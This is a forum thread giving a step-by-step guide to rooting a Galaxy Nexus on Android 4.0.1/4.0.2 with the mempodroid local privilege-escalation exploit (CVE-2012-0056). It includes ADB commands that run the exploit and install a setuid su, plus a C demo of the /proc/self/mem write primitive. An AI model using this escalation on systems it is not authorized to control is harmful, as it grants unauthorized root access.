XDA Developers Android and Mobile Development Forum

[HOW-TO] [GSM & CDMA] Root without Unlocking Bootloader via exploit (for 4.0.1/4.0.2)

efrant
(Last edited by efrant; 15th July 2012 at 12:50 AM.)
#1
Senior Moderator - OP
Join Date: Feb 2009
Location: Montreal
Edit: This does not work on anything newer than ICL53F (i.e., 4.0.2). It works fine on ITL41D (4.0.1), ITL41F (4.0.1) and ICL53F (4.0.2).

Once you have got root, you can now use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!

Disclaimer: I take no credit for this exploit or the implementation of it (but I will take credit for the step-by-step). Thanks to kendong2 for pointing it out to me here.

So, it looks like zx2c4 has found a local privilege escalation exploit. See source here, and saurik has managed to package it together for Android. See here. Although this may be old news to some, I hadn't seen it before.

So what does this all mean:
  • If you are running a 2.6.39 kernel (or above), which all Galaxy Nexus devices are, you can now root your device without having to unlock your bootloader (and without losing your data).
  • Moreover, you should now be able to root your device even if your hardware buttons are not working.
  • Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.

Notes:
1) This assumes that you have USB Debugging enabled on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
2) This needs to be done over ADB, as a terminal emulator on-device does not have the appropriate access. If you do not have ADB, I've attached it in the zip. Unzip all files.
3) Some users indicate that, once they had finished the procedure, they needed to open the Superuser app.

Step-by-step:
1) Download the attached files to your computer and unzip them in the same directory as your adb.exe file;
2) Open a command prompt in the same directory;
3) Copy the files to your device:

adb push mempodroid /data/local/tmp/mempodroid
adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk


4) Open a shell: adb shell
5) Change permission on mempodroid to allow it to run: chmod 777 /data/local/tmp/mempodroid
6) Run the exploit: /data/local/tmp/mempodroid 0xd7f4 0xad4b sh

Note: Once you do step 6, your prompt should change from $ to #. If not, it did not work.

7) Mount the system partition as rw: mount -o remount,rw -t ext4 /dev/block/mmcblk0p10 /system
8) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
9) Change permissions on su: chmod 06755 /system/bin/su
10) Copy Superuser.apk: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
11) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
12) Mount the system partition as r/o: mount -o remount,ro -t ext4 /dev/block/mmcblk0p10 /system
13) Rescind root: exit
14) Exit the ADB shell: exit
15) Done. You now should have root without having to unlock your bootloader.
Attached Files
Root-locked-GN.zip (479.8 KB)
platform-tools-v19.zip (661.9 KB)
At present, I am not readily available on the forums or via PM -- if you are in need of a moderator, please contact someone from this list.

I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
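The two hex arguments in step 6 are addresses inside the setuid run-as binary of that particular build, which is why the procedure is tied to 4.0.1/4.0.2. As an added example that is not code from efrant's post, from zx2c4's exploit or from saurik's mempodroid, the C program below shows the kernel primitive the exploit is built on: the file offset of /proc/<pid>/mem is a virtual address, so a write() on that descriptor patches the target's memory, and once the descriptor has been lseek()ed to an address and dup2()ed onto stderr, whatever the program prints as an error message is delivered into memory at that address. CVE-2012-0056 (the zx2c4 finding, fixed in 3.0.18 as renaud notes further down) was that such a descriptor opened on /proc/self/mem could still be used to write into the process after it had execve()d a setuid binary, so the setuid program's own error text overwrote its code at the two offsets above. The demo only writes into its own writable globals and execs nothing; it assumes a Linux host with /proc mounted and reports failure otherwise.

```c
/* Added example (not from efrant's post, zx2c4's exploit or saurik's mempodroid):
 * the /proc/<pid>/mem write channel that mempodroid turns into code execution,
 * demonstrated harmlessly against this process's own writable globals.
 * Assumes Linux with /proc mounted; every function reports failure otherwise. */
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Globals we overwrite without any store instruction naming them: the bytes
 * arrive through file writes that the kernel turns into memory writes. */
static volatile int patched_value = 0x11111111;
static char target_buf[32] = "original contents";

/* Open /proc/self/mem and position it at a virtual address. The file offset
 * of /proc/<pid>/mem *is* the address in the target's address space. */
static int open_self_mem_at(const void *addr)
{
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0)
        return -1;
    if (lseek(fd, (off_t)(uintptr_t)addr, SEEK_SET) == (off_t)-1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* 1) The bare primitive: write() on the descriptor patches memory at addr.
 *    Returns the value of patched_value afterwards, or -1 on failure. */
int demo_direct_write(void)
{
    int payload = 0x41414141;
    int fd = open_self_mem_at((const void *)&patched_value);
    if (fd < 0)
        return -1;
    ssize_t w = write(fd, &payload, sizeof payload);
    close(fd);
    return w == (ssize_t)sizeof payload ? patched_value : -1;
}

/* 2) The mempodroid trick: dup2() the positioned descriptor onto stderr, so an
 *    ordinary error message written by the program becomes the payload. In the
 *    real exploit the descriptor survives execve() of the setuid binary and that
 *    binary's own error text lands on its code; here it lands in target_buf.
 *    Returns target_buf after the write, or NULL on failure. */
const char *demo_stderr_write(const char *msg)
{
    size_t n = strlen(msg) + 1;              /* keep the NUL so target_buf stays a C string */
    if (n > sizeof target_buf)
        return NULL;
    int saved_stderr = dup(STDERR_FILENO);   /* so the real stderr can be restored */
    if (saved_stderr < 0)
        return NULL;
    int fd = open_self_mem_at(target_buf);
    if (fd < 0 || dup2(fd, STDERR_FILENO) < 0) {
        if (fd >= 0)
            close(fd);
        close(saved_stderr);
        return NULL;
    }
    close(fd);                               /* fd 2 now shares the offset, i.e. the address */
    ssize_t w = write(STDERR_FILENO, msg, n);   /* "the error message" */
    dup2(saved_stderr, STDERR_FILENO);
    close(saved_stderr);
    return w == (ssize_t)n ? target_buf : NULL;
}

int main(void)
{
    printf("patched_value after write(): 0x%x\n", (unsigned)demo_direct_write());
    const char *s = demo_stderr_write("error: no such package");
    printf("target_buf after stderr write: %s\n", s ? s : "(failed)");
    return 0;
}
```

Nothing here is privileged: a process is always allowed to open its own /proc/self/mem, and that is exactly what the vulnerable kernels got wrong, because the descriptor kept that permission after the process turned into a setuid root program by execve(). The size guard in demo_stderr_write is the one thing the real exploit does not need, since it wants the error text to spill over the target code.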
 
efrant
(Last edited by KennyG123; 19th September 2012 at 05:11 PM.)
#2
Senior Moderator - OP
Reserved
 
efrant
(Last edited by KennyG123; 19th September 2012 at 05:12 PM.)
#3
Senior Moderator - OP
Reserved
 
times_infinity
#4
Senior Member
Join Date: Oct 2010
This is the same as https://github.com/saurik/mempodroid

saurik ftw.
 
efrant
#5
Senior Moderator - OP
Quote:
Originally Posted by times_infinity View Post
This is the same as https://github.com/saurik/mempodroid

saurik ftw.
Not sure what you are getting at? I mentioned saurik in the first post, and the link you posted is in the first post. And I mentioned that this may be old news, but I haven't seen it anywhere before today in the GN forums.
 
Sleuth255
#6
Retired Senior Moderator
Join Date: Mar 2006
Location: Milwaukee
Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!



ROM: rooted/deodexed 4.1.1 (JRO03O)
Kernel: Franco Dailies: r295
Baseband: FF02/FG02
Follow my Ramblings: blog.kwilcox.org
 
renaud
#7
Recognized Developer
Join Date: Aug 2010
Location: Braine-l'Alleud
Quote:
Originally Posted by Sleuth255 View Post
Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!
You need ICS to have a vulnerable kernel version, so given the number of devices which currently have ICS officially, I doubt it will be common. I'd also expect Google and vendors to correct this in the next release.

Also many custom kernels don't have this flaw as they are at or over 3.0.18 or have patched it. This prevents gaining unnoticed root.

 
Sleuth255
#8
Retired Senior Moderator
Hmmm I thought 2.6.39 was found in GB builds. This exploit is almost a root fix for the Moto DX 4.5.621 fiasco. Unfortunately the kernel for that build is 2.6.32.9.

 
jaykruer
#9
Senior Member
Join Date: Aug 2010
This was huge in the headlines a few weeks back. It's nice to see someone putting it to a good use!

 
Huxleysäl
#10
Junior Member
Join Date: Mar 2012
Hi, been lurking a while, registered to clear up some things.

I did some research while attempting to access the /data/local/ folder with a terminal emulator and I found that it would be impossible to write to it or to find it while being unrooted. Rooting a phone through using an unrooted access root seems impossible.

Did I miss something, or is there any other way to copy mempodroid to the data folder? I sure would like to keep all my files.
